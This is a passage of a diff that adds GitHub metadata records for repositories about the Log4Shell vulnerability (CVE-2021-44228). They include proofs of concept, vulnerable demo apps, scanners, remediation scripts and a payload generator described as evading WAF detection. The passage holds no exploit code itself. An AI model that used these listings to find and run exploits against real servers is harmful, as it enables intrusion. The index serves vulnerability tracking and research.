+ "html_url": "https:\/\/github.com\/paulvkitor\/log4shellwithlog4j2_13_3",
+ "description": "Springboot web application accepts a name get parameter and logs its value to log4j2. Vulnerable to CVE-2021-44228.",
+ "fork": false,
+ "created_at": "2022-03-09T02:29:58Z",
+ "updated_at": "2022-03-09T04:11:03Z",
+ "pushed_at": "2022-03-09T04:11:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 468389206,
+ "name": "vulescanjndilookup",
+ "full_name": "MiguelM001\/vulescanjndilookup",
+ "owner": {
+ "login": "MiguelM001",
+ "id": 22323920,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22323920?v=4",
+ "html_url": "https:\/\/github.com\/MiguelM001"
+ },
+ "html_url": "https:\/\/github.com\/MiguelM001\/vulescanjndilookup",
+ "description": "HERRAMIENTA AUTOMATIZADA PARA LA DETECCION DE LA VULNERABILIDAD CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-03-10T14:57:30Z",
+ "updated_at": "2022-03-10T15:56:57Z",
+ "pushed_at": "2022-03-11T17:49:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 468746734,
+ "name": "CVE-2021-44228",
+ "full_name": "Jun-5heng\/CVE-2021-44228",
+ "owner": {
+ "login": "Jun-5heng",
+ "id": 88525975,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4",
+ "html_url": "https:\/\/github.com\/Jun-5heng"
+ },
+ "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-44228",
+ "description": "Log4j2组件命令执行RCE \/ Code By:Jun_sheng",
+ "fork": false,
+ "created_at": "2022-03-11T12:43:15Z",
+ "updated_at": "2022-03-11T13:24:13Z",
+ "pushed_at": "2022-03-11T13:24:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469576160,
+ "name": "CVE-2021-44228",
+ "full_name": "honypot\/CVE-2021-44228",
+ "owner": {
+ "login": "honypot",
+ "id": 101309325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4",
+ "html_url": "https:\/\/github.com\/honypot"
+ },
+ "html_url": "https:\/\/github.com\/honypot\/CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-14T04:09:36Z",
+ "updated_at": "2022-03-14T04:09:57Z",
+ "pushed_at": "2022-03-14T04:10:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469576898,
+ "name": "CVE-2021-44228-vuln-app",
+ "full_name": "honypot\/CVE-2021-44228-vuln-app",
+ "owner": {
+ "login": "honypot",
+ "id": 101309325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4",
+ "html_url": "https:\/\/github.com\/honypot"
+ },
+ "html_url": "https:\/\/github.com\/honypot\/CVE-2021-44228-vuln-app",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-14T04:13:13Z",
+ "updated_at": "2022-03-14T04:13:24Z",
+ "pushed_at": "2022-03-14T04:16:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 477232735,
+ "name": "log4shell-honeypot",
+ "full_name": "vulnerable-apps\/log4shell-honeypot",
+ "owner": {
+ "login": "vulnerable-apps",
+ "id": 79924070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79924070?v=4",
+ "html_url": "https:\/\/github.com\/vulnerable-apps"
+ },
+ "html_url": "https:\/\/github.com\/vulnerable-apps\/log4shell-honeypot",
+ "description": "Java application vulnerable to the CVE-2021-44228 (a.k.a log4shell) vulnerability",
+ "fork": false,
+ "created_at": "2022-04-03T03:58:11Z",
+ "updated_at": "2022-04-03T03:58:01Z",
+ "pushed_at": "2021-12-17T10:51:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 482498767,
+ "name": "log4j-scanner",
+ "full_name": "manishkanyal\/log4j-scanner",
+ "owner": {
+ "login": "manishkanyal",
+ "id": 39938426,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39938426?v=4",
+ "html_url": "https:\/\/github.com\/manishkanyal"
+ },
+ "html_url": "https:\/\/github.com\/manishkanyal\/log4j-scanner",
+ "description": "A Log4j vulnerability scanner is used to identify the CVE-2021-44228 and CVE_2021_45046",
+ "fork": false,
+ "created_at": "2022-04-17T11:01:24Z",
+ "updated_at": "2022-11-10T04:02:56Z",
+ "pushed_at": "2022-04-17T11:27:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 487163916,
+ "name": "Writing-Sample-1",
+ "full_name": "TPower2112\/Writing-Sample-1",
+ "owner": {
+ "login": "TPower2112",
+ "id": 20917633,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20917633?v=4",
+ "html_url": "https:\/\/github.com\/TPower2112"
+ },
+ "html_url": "https:\/\/github.com\/TPower2112\/Writing-Sample-1",
+ "description": "CVE-2021-44228 Log4j Summary",
+ "fork": false,
+ "created_at": "2022-04-30T02:35:38Z",
+ "updated_at": "2022-12-15T00:15:39Z",
+ "pushed_at": "2022-11-19T19:37:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j2",
+ "markdown",
+ "mitigations"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 487921535,
+ "name": "Log4j-Exploit-CVE-2021-44228",
+ "full_name": "Willian-2-0-0-1\/Log4j-Exploit-CVE-2021-44228",
+ "owner": {
+ "login": "Willian-2-0-0-1",
+ "id": 39037497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39037497?v=4",
+ "html_url": "https:\/\/github.com\/Willian-2-0-0-1"
+ },
+ "html_url": "https:\/\/github.com\/Willian-2-0-0-1\/Log4j-Exploit-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-02T16:53:26Z",
+ "updated_at": "2022-05-02T16:53:26Z",
+ "pushed_at": "2022-05-14T13:18:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 490330900,
+ "name": "Log4Shell-obfuscated-payloads-generator",
+ "full_name": "r3kind1e\/Log4Shell-obfuscated-payloads-generator",
+ "owner": {
+ "login": "r3kind1e",
+ "id": 85721156,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85721156?v=4",
+ "html_url": "https:\/\/github.com\/r3kind1e"
+ },
+ "html_url": "https:\/\/github.com\/r3kind1e\/Log4Shell-obfuscated-payloads-generator",
+ "description": "Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.",
+ "fork": false,
+ "created_at": "2022-05-09T15:02:29Z",
+ "updated_at": "2024-02-28T15:37:46Z",
+ "pushed_at": "2022-05-26T03:18:31Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "log4j",
+ "log4shell",
+ "vulnerability-research",
+ "waf-bypass"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 491872919,
+ "name": "CVE-2021-44228",
+ "full_name": "Phineas09\/CVE-2021-44228",
+ "owner": {
+ "login": "Phineas09",
+ "id": 40483676,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40483676?v=4",
+ "html_url": "https:\/\/github.com\/Phineas09"
+ },
+ "html_url": "https:\/\/github.com\/Phineas09\/CVE-2021-44228",
+ "description": "Log4Shell Proof-Of-Concept derived from https:\/\/github.com\/kozmer\/log4j-shell-poc",
+ "fork": false,
+ "created_at": "2022-05-13T11:35:22Z",
+ "updated_at": "2022-05-13T11:40:56Z",
+ "pushed_at": "2022-05-13T16:49:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 494502983,
+ "name": "log4j",
+ "full_name": "hassaanahmad813\/log4j",
+ "owner": {
+ "login": "hassaanahmad813",
+ "id": 77528817,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77528817?v=4",
+ "html_url": "https:\/\/github.com\/hassaanahmad813"
+ },
+ "html_url": "https:\/\/github.com\/hassaanahmad813\/log4j",
+ "description": "CVE-2021-44228 vulnerability in Apache Log4j library",
+ "fork": false,
+ "created_at": "2022-05-20T14:48:29Z",
+ "updated_at": "2023-04-10T12:51:15Z",
+ "pushed_at": "2021-12-17T08:49:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 496048138,
+ "name": "CVE-2021-44228-Apache-Log4j-Rce",
+ "full_name": "yuuki1967\/CVE-2021-44228-Apache-Log4j-Rce",
+ "owner": {
+ "login": "yuuki1967",
+ "id": 11524508,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11524508?v=4",
+ "html_url": "https:\/\/github.com\/yuuki1967"
+ },
+ "html_url": "https:\/\/github.com\/yuuki1967\/CVE-2021-44228-Apache-Log4j-Rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-25T01:56:14Z",
+ "updated_at": "2022-05-25T01:56:32Z",
+ "pushed_at": "2023-05-26T05:20:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 500852820,
+ "name": "tf-log4j-aws-poc",
+ "full_name": "moshuum\/tf-log4j-aws-poc",
+ "owner": {
+ "login": "moshuum",
+ "id": 1893265,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1893265?v=4",
+ "html_url": "https:\/\/github.com\/moshuum"
+ },
+ "html_url": "https:\/\/github.com\/moshuum\/tf-log4j-aws-poc",
+ "description": "This project files demostrate a proof-of-concept of log4j vulnerability (CVE-2021-44228) on AWS using Terraform Infrastructure-as-a-code means.",
+ "fork": false,
+ "created_at": "2022-06-07T13:30:37Z",
+ "updated_at": "2022-06-07T23:24:00Z",
+ "pushed_at": "2022-06-08T04:14:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 501054329,
+ "name": "CVE-2021-44228",
+ "full_name": "jaehnri\/CVE-2021-44228",
+ "owner": {
+ "login": "jaehnri",
+ "id": 30930799,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30930799?v=4",
+ "html_url": "https:\/\/github.com\/jaehnri"
+ },
+ "html_url": "https:\/\/github.com\/jaehnri\/CVE-2021-44228",
+ "description": "Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2022-06-08T01:09:28Z",
+ "updated_at": "2023-06-01T16:45:21Z",
+ "pushed_at": "2022-07-07T03:35:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 502589993,
+ "name": "Log4Shell-CVE-2021-44228-Demo",
+ "full_name": "ra890927\/Log4Shell-CVE-2021-44228-Demo",
+ "owner": {
+ "login": "ra890927",
+ "id": 48157503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48157503?v=4",
+ "html_url": "https:\/\/github.com\/ra890927"
+ },
+ "html_url": "https:\/\/github.com\/ra890927\/Log4Shell-CVE-2021-44228-Demo",
+ "description": "Log4Shell CVE-2021-44228 Demo",
+ "fork": false,
+ "created_at": "2022-06-12T10:57:07Z",
+ "updated_at": "2022-12-11T13:51:49Z",
+ "pushed_at": "2022-06-13T02:37:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "docker",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 514092288,
+ "name": "log4j-scan",
+ "full_name": "bughuntar\/log4j-scan",
+ "owner": {
+ "login": "bughuntar",
+ "id": 99727538,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4",
+ "html_url": "https:\/\/github.com\/bughuntar"
+ },
+ "html_url": "https:\/\/github.com\/bughuntar\/log4j-scan",
+ "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-07-15T01:07:56Z",
+ "updated_at": "2023-04-03T07:55:20Z",
+ "pushed_at": "2022-07-15T01:22:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 515491317,
+ "name": "Ethical-Hacking-Report-Log4j",
+ "full_name": "vidrez\/Ethical-Hacking-Report-Log4j",
+ "owner": {
+ "login": "vidrez",
+ "id": 36509217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36509217?v=4",
+ "html_url": "https:\/\/github.com\/vidrez"
+ },
+ "html_url": "https:\/\/github.com\/vidrez\/Ethical-Hacking-Report-Log4j",
+ "description": ":page_with_curl: A report about CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-07-19T08:03:05Z",
+ "updated_at": "2024-04-29T17:22:54Z",
+ "pushed_at": "2022-07-19T08:08:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 520582575,
+ "name": "CVE-2021-44228",
+ "full_name": "vino-theva\/CVE-2021-44228",
+ "owner": {
+ "login": "vino-theva",
+ "id": 106059311,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106059311?v=4",
+ "html_url": "https:\/\/github.com\/vino-theva"
+ },
+ "html_url": "https:\/\/github.com\/vino-theva\/CVE-2021-44228",
+ "description": "Apache Log4j is a logging tool written in Java. This paper focuses on what is Log4j and log4shell vulnerability and how it works, how it affects the victim, and how can this be mitigated",
+ "fork": false,
+ "created_at": "2022-08-02T17:03:55Z",
+ "updated_at": "2022-08-02T17:03:55Z",
+ "pushed_at": "2022-08-02T17:12:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 526103436,
+ "name": "tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228",
+ "full_name": "tharindudh\/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228",
+ "owner": {
+ "login": "tharindudh",
+ "id": 71964544,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71964544?v=4",
+ "html_url": "https:\/\/github.com\/tharindudh"
+ },
+ "html_url": "https:\/\/github.com\/tharindudh\/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-18T07:27:32Z",
+ "updated_at": "2022-08-18T07:27:32Z",
+ "pushed_at": "2022-08-18T07:30:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 529025141,
+ "name": "jankybank",
+ "full_name": "eurogig\/jankybank",
+ "owner": {
+ "login": "eurogig",
+ "id": 9045562,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9045562?v=4",
+ "html_url": "https:\/\/github.com\/eurogig"
+ },
+ "html_url": "https:\/\/github.com\/eurogig\/jankybank",
+ "description": "Simple Java Front and Back end with bad log4j version featuring CVE-2021-44228",
+ "fork": false,
+ "created_at": "2022-08-25T21:35:32Z",
+ "updated_at": "2022-08-25T21:37:58Z",
+ "pushed_at": "2024-03-12T11:22:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 533987858,
+ "name": "Log4j-CVE-2021-44228-Remediation",
+ "full_name": "digital-dev\/Log4j-CVE-2021-44228-Remediation",
+ "owner": {
+ "login": "digital-dev",
+ "id": 18492599,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18492599?v=4",
+ "html_url": "https:\/\/github.com\/digital-dev"
+ },
+ "html_url": "https:\/\/github.com\/digital-dev\/Log4j-CVE-2021-44228-Remediation",
+ "description": "This powershell script is intended to be used by anyone looking to remediate the Log4j Vulnerability within their environment. It can target multiple machines and run remotely as a job on all or only affected devices.",
+ "fork": false,
+ "created_at": "2022-09-08T00:22:57Z",
+ "updated_at": "2022-09-08T00:23:02Z",
+ "pushed_at": "2024-01-26T02:09:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 539366249,
+ "name": "log4j-shell-poc",
+ "full_name": "ocastel\/log4j-shell-poc",
+ "owner": {
+ "login": "ocastel",
+ "id": 3749321,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3749321?v=4",
+ "html_url": "https:\/\/github.com\/ocastel"
+ },
+ "html_url": "https:\/\/github.com\/ocastel\/log4j-shell-poc",
+ "description": "A Proof-Of-Concept for the CVE-2021-44228 vulnerability. ",
+ "fork": false,
+ "created_at": "2022-09-21T07:43:15Z",
+ "updated_at": "2022-09-21T09:04:17Z",
+ "pushed_at": "2022-09-21T14:45:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 539674997,
+ "name": "CVE-2021-44228-poc",
+ "full_name": "bcdunbar\/CVE-2021-44228-poc",
+ "owner": {
+ "login": "bcdunbar",
+ "id": 8393928,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8393928?v=4",
+ "html_url": "https:\/\/github.com\/bcdunbar"
+ },
+ "html_url": "https:\/\/github.com\/bcdunbar\/CVE-2021-44228-poc",
+ "description": "CVE-2021-44228 POC \/ Example",
+ "fork": false,
+ "created_at": "2022-09-21T20:33:06Z",
+ "updated_at": "2022-09-29T22:57:36Z",
+ "pushed_at": "2022-09-29T22:57:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 563424783,
+ "name": "CVE-2021-44228",
+ "full_name": "srcporter\/CVE-2021-44228",
+ "owner": {
+ "login": "srcporter",
+ "id": 42175824,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42175824?v=4",
+ "html_url": "https:\/\/github.com\/srcporter"
+ },
+ "html_url": "https:\/\/github.com\/srcporter\/CVE-2021-44228",
+ "description": "DO NOT USE FOR ANYTHING REAL. Simple springboot sample app with vulnerability CVE-2021-44228 aka \"Log4Shell\" ",
+ "fork": false,
+ "created_at": "2022-11-08T15:29:42Z",
+ "updated_at": "2022-11-09T00:45:01Z",
+ "pushed_at": "2022-11-08T15:29:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 583519721,
+ "name": "log4j2_CVE-2021-44228",
+ "full_name": "Nexolanta\/log4j2_CVE-2021-44228",
+ "owner": {
+ "login": "Nexolanta",
+ "id": 73454853,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73454853?v=4",
+ "html_url": "https:\/\/github.com\/Nexolanta"
+ },
+ "html_url": "https:\/\/github.com\/Nexolanta\/log4j2_CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-12-30T02:46:33Z",
+ "updated_at": "2022-12-30T02:54:02Z",
+ "pushed_at": "2022-12-30T02:48:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 595794114,
+ "name": "Log4j-Vulnerability",
+ "full_name": "demining\/Log4j-Vulnerability",
+ "owner": {
+ "login": "demining",
+ "id": 87700947,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87700947?v=4",
+ "html_url": "https:\/\/github.com\/demining"
+ },
+ "html_url": "https:\/\/github.com\/demining\/Log4j-Vulnerability",
+ "description": "Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (Log4Shell). Attackers can exploit vulnerable servers by connecting over any protocol, such as HTTPS, and sending a specially crafted string.",
+ "fork": false,
+ "created_at": "2023-01-31T20:29:26Z",
+ "updated_at": "2024-03-27T19:53:25Z",
+ "pushed_at": "2023-01-31T20:35:59Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "attack",
+ "bitcoin",
+ "blockchain",
+ "cve-2021-44228",
+ "hack",
+ "hacking",
+ "log4j",
+ "log4js",
+ "log4shell",
+ "mining",
+ "vulnerability",
+ "vulnerability-scanner",
+ "vulnerable"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 599082211,
+ "name": "Log4Shell-CVE-2021-44228-PoC",
+ "full_name": "pierpaolosestito-dev\/Log4Shell-CVE-2021-44228-PoC",
+ "owner": {
+ "login": "pierpaolosestito-dev",
+ "id": 112246529,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112246529?v=4",
+ "html_url": "https:\/\/github.com\/pierpaolosestito-dev"
+ },
+ "html_url": "https:\/\/github.com\/pierpaolosestito-dev\/Log4Shell-CVE-2021-44228-PoC",
+ "description": "CVE 2021-44228 Proof-of-Concept. Log4Shell is an attack against Servers that uses vulnerable versions of Log4J. ",
+ "fork": false,
+ "created_at": "2023-02-08T12:19:32Z",
+ "updated_at": "2024-03-25T10:24:18Z",
+ "pushed_at": "2023-02-08T12:20:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "attack",
+ "java",
+ "jndi-exploit",
+ "jndi-lookups",
+ "ldap",
+ "log4j-rce",
+ "security",
+ "vulnerabilities"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 614031542,
+ "name": "Log4j-PoC",
+ "full_name": "Sma-Das\/Log4j-PoC",
+ "owner": {
+ "login": "Sma-Das",
+ "id": 20164942,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20164942?v=4",
+ "html_url": "https:\/\/github.com\/Sma-Das"
+ },
+ "html_url": "https:\/\/github.com\/Sma-Das\/Log4j-PoC",
+ "description": "An educational Proof of Concept for the Log4j Vulnerability (CVE-2021-44228) in Minecraft",
+ "fork": false,
+ "created_at": "2023-03-14T18:49:36Z",
+ "updated_at": "2023-08-15T12:50:40Z",
+ "pushed_at": "2023-03-14T18:50:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "gradle",
+ "java",
+ "log4j",
+ "log4j2",
+ "minecraft",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 616448829,
+ "name": "CVE-2021-44228",
+ "full_name": "heeloo123\/CVE-2021-44228",
+ "owner": {
+ "login": "heeloo123",
+ "id": 100338414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100338414?v=4",
+ "html_url": "https:\/\/github.com\/heeloo123"
+ },
+ "html_url": "https:\/\/github.com\/heeloo123\/CVE-2021-44228",
+ "description": "CVE-2021-44228 ",
+ "fork": false,
+ "created_at": "2023-03-20T12:13:13Z",
+ "updated_at": "2023-03-20T12:13:13Z",
+ "pushed_at": "2023-03-20T12:31:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
